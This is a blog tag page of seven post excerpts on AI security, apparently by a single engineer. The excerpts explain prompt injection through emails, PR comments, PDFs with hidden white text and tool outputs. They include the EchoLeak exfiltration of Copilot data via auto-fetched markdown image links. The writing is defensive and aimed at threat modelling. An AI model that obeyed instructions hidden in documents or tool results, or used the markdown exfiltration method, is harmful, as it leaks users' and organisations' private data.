Skip to main content

7 posts tagged with "ai-security"

View all tags

Output As Payload: Your AI Threat Model Got Half The Boundary

· 9 min read
Tian Pan
Software Engineer

The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."

The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.

EchoLeak is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions cause Copilot to embed sensitive context into a reference-style markdown link in its response, and the client interface auto-fetches the external image — exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack didn't need to break the model's refusal calibration. It needed to shape one specific token sequence in the output.

The 80-Question Wall: What Enterprise AI Security Questionnaires Actually Demand

· 11 min read
Tian Pan
Software Engineer

The AI feature your team shipped in March is unsellable to half your pipeline, and the engineering org doesn't know it yet. Somewhere in account-executive Slack, a deal at 80% probability just got kicked from forecast because the prospect's CISO sent over a 92-question security review with an AI addendum. Question 31 asks for your training data provenance documentation. Question 47 asks whether prompts are logged, where, for how long, and who can read them. Question 63 asks whether your inference can be region-pinned to the EU. Question 78 asks for your prompt-injection resistance rate against the OWASP LLM Top 10 corpus, with measured numbers, by model version. The deal team has 72 hours to respond. Nobody on the AI team has written down the answer to any of these.

This is the new wall. Fortune 500 procurement teams now run AI-feature-specific security reviews that didn't exist in 2023, and the answers your engineering org needs aren't hard to produce — they're just nobody's job. The questions are concrete, the frameworks are public, and yet most AI products are quietly unsellable to regulated enterprises because the answers were never written down.

The frustrating part is that none of this is mysterious. The questionnaires are templated. The expected answers are documented. The real failure mode is that AI features were shipped on the assumption that the existing SOC 2 report would carry the same enterprise-deal weight it carried for the last decade — and it doesn't.

The Coding Agent Autonomy Curve: Reading Is Free, Merging Is Incident-Class

· 11 min read
Tian Pan
Software Engineer

The discourse on coding agents keeps collapsing to a binary: autonomous or supervised, YOLO mode or hand-on-the-wheel, --dangerously-skip-permissions or "approve every keystroke." That framing is a category error. A coding agent does not perform "an action." It performs a sequence of actions whose costs span at least seven orders of magnitude — from reading a file (free, undoable, no side effect) to merging to main (irreversible without a revert PR) to rolling out a binary to a fleet (six-figure incident-class). Treating that range with one autonomy switch is like setting a single speed limit for both a parking lot and a freeway.

The team that ships "the agent can do everything" without mapping each action to its blast radius is one prompt-injection-bearing GitHub comment away from a postmortem — and we already have public examples of that exact failure mode. Anthropic's Claude Code Security Review, Google's Gemini CLI Action, and GitHub Copilot Agent were all confirmed in 2026 to be hijackable through specially crafted PR titles and issue bodies, in an attack pattern the researchers named "Comment and Control." The agents weren't broken in some abstract sense. They executed a high-tier action — pushing code, opening a PR — on the basis of a low-trust input the autonomy tier had silently flattened into "all the same."

What follows is the discipline that has to land: a per-action curve, gates that scale with the tier, rollback velocity matched to blast class, and an eval program that tests for tool-composition escalation rather than single-action failure.

Per-Tenant Inference Isolation: When Shared Cache, Fine-Tunes, and Embeddings Leak Across Customers

· 12 min read
Tian Pan
Software Engineer

Multi-tenant SaaS solved data isolation a decade ago. Row-level security in Postgres, per-tenant encryption keys, S3 bucket policies scoped to tenant prefixes — by 2018 the playbook was so well-rehearsed that an auditor asking "show me how customer A's data cannot reach customer B" had a one-page answer with a citation per layer. AI features quietly reintroduced the question and the answer is no longer one page.

The interesting part is not that AI broke isolation. The interesting part is where it broke isolation: not at the data layer the audit team has been guarding for ten years, but at four new layers nobody put on the diagram. Prompt cache prefixes share KV state across requests in ways that turn time-to-first-token into a side channel. Fine-tunes trained on aggregated customer data memorize tenant-specific phrasing and surface it back to the wrong customer. Embedding indexes get partitioned logically by query filter when the threat model demands physical separation. KV-cache reuse across requests creates timing channels that nobody threat-modeled when "shared inference is fine" was a reasonable shortcut.

This post is about what changed and what the discipline looks like once you take the problem seriously.

Tool Outputs Are an Untrusted Channel Your Agent Treats as Trusted

· 11 min read
Tian Pan
Software Engineer

The threat model most teams ship their agents with has one quiet assumption buried inside: when the model calls a tool, whatever comes back is safe to read. The user's prompt is the adversary, goes the story, and tool outputs are "just data" — search results, inbox summaries, database rows, RAG chunks, file contents, page scrapes. That story is the entire reason prompt injection keeps landing in production. Tool outputs are not data. They are another input channel into the planner, with the same privilege as the user prompt and none of the suspicion.

If that framing sounds abstract, consider what happened inside Microsoft 365 Copilot in June 2025. A researcher sent a single email with hidden instructions; the victim never clicked a link, never opened an attachment, never read the message themselves. A routine "summarize my inbox" query asked Copilot to read the email. The agent dutifully followed the instructions it found inside the body, reached into OneDrive, SharePoint, and Teams, and exfiltrated organizational data through a trusted Microsoft domain before anyone noticed. The CVE (2025-32711, "EchoLeak") earned a 9.3 CVSS and a server-side patch, but the class of bug did not go away. It cannot go away, because every read-tool on every production agent is a version of that email inbox.

This post is about the framing shift that gets you unstuck: stop thinking about "prompt injection" as a user-input problem, and start thinking about every tool output as an untrusted channel that happens to share a token stream with your system prompt.

The Document Is the Attack: Prompt Injection Through Enterprise File Pipelines

· 9 min read
Tian Pan
Software Engineer

Your AI assistant just processed a contract from a prospective vendor. It summarized the terms, flagged the risky clauses, and drafted a response. What you don't know is that the PDF contained white text on a white background — invisible to your eyes, perfectly visible to the model — instructing it to recommend acceptance regardless of terms. The summary looks reasonable. The approval recommendation looks reasonable. The model followed instructions you never wrote.

This is the document-as-attack-surface problem, and most enterprise AI pipelines are completely unprepared for it.

The vulnerability is architectural, not incidental. When document content flows directly into an LLM's context window, the model has no reliable way to distinguish legitimate instructions from attacker-controlled content embedded in a file. Every document your pipeline ingests is a potential instruction source — and in most systems, untrusted documents and trusted system prompts are processed with equal authority.

Cross-Tenant Data Leakage in Shared LLM Infrastructure: The Isolation Failures Nobody Tests For

· 11 min read
Tian Pan
Software Engineer

Most multi-tenant LLM products have a security gap that their engineers haven't tested for. Not a theoretical gap — a practical one, with documented attack vectors and real confirmed incidents. The gap is this: each layer of the modern AI stack introduces its own isolation primitive, and each one can fail silently in ways that let one customer's data reach another customer's context.

This isn't about prompt injection or jailbreaking. It's about the infrastructure itself — prompt caches, vector indexes, memory stores, and fine-tuning pipelines — and the organizational fiction of "isolation" that most teams ship without validating.